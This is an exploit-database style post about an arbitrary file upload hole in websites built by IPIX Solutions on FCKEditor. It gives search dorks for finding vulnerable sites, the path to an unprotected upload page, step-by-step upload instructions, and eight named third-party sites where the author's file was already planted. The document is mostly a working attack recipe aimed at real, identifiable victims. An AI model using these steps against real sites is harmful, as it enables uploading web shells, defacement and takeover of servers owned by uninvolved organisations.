#Exploit Title 		: IPIX Solutions (FCKEditor) File Upload Vulnerability
#Author 		: DevilScreaM
#Date   		: 14/09/2013
#Category		: Web Applications 
#Vendor 		: http://ipixsolutions.com

#Dork   	
intext:Powered By Ipix Solutions
intext:Powered By:IPIX SOLUTIONS
intext:Website Design @ IPIX Solutions.

#Vulnerability  	: Arbitrary File Upload Vulnerability
#Tested On 		: Windows 7/XP , Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker


POC and Exploit

http://site-target/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

===================================================================================

1. At "Select the "File Uploader" to use" Change From ASP to PHP

2. Select Your File

3. Click Send it to Server, and waiting...

4. Result Upload At

http://site-target/userfiles/[YOUR_FILE.txt]

===================================================================================

Example

http://morisonmenonlimited.com/userfiles/devilscream.txt
http://smdentallab.org/userfiles/devilscream.txt
http://rklatex.com/userfiles/devilscream.txt
http://malabarholidays.com/userfiles/devilscream.txt
http://mimsindia.com/userfiles/devilscream.txt
http://stjosephstly.com/userfiles/devilscream.txt
http://memundahss.com/userfiles/devilscream.txt
http://novadenttly.com/userfiles/devilscream.txt